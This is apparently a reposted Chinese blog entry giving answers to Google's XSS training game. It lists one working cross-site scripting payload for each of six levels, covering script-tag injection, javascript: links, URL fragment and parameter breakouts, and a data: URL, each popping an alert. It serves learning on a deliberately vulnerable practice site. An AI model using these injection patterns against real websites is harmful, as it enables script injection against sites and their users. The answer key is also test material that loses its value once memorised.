Google XSS 小游戏 答案
Posted borber
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Google XSS 小游戏 答案相关的知识,希望对你有一定的参考价值。
记录
-
第一关
</b><script>alert("Borber")</script>
-
第二关
<p>hello <a name="n" href="javascript:alert(‘Borber‘)"><em>Borber</em></a></p>
-
第三关
https://xss-game.appspot.com/level3/frame#4‘><script>alert("Borber")</script>
-
第四关
https://xss-game.appspot.com/level4/frame?timer=100‘),alert(‘Borber
-
第五关
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("Borber")
-
第六关
https://xss-game.appspot.com/level6/frame#data:text/plain,alert("Borber")
以上是关于Google XSS 小游戏 答案的主要内容,如果未能解决你的问题,请参考以下文章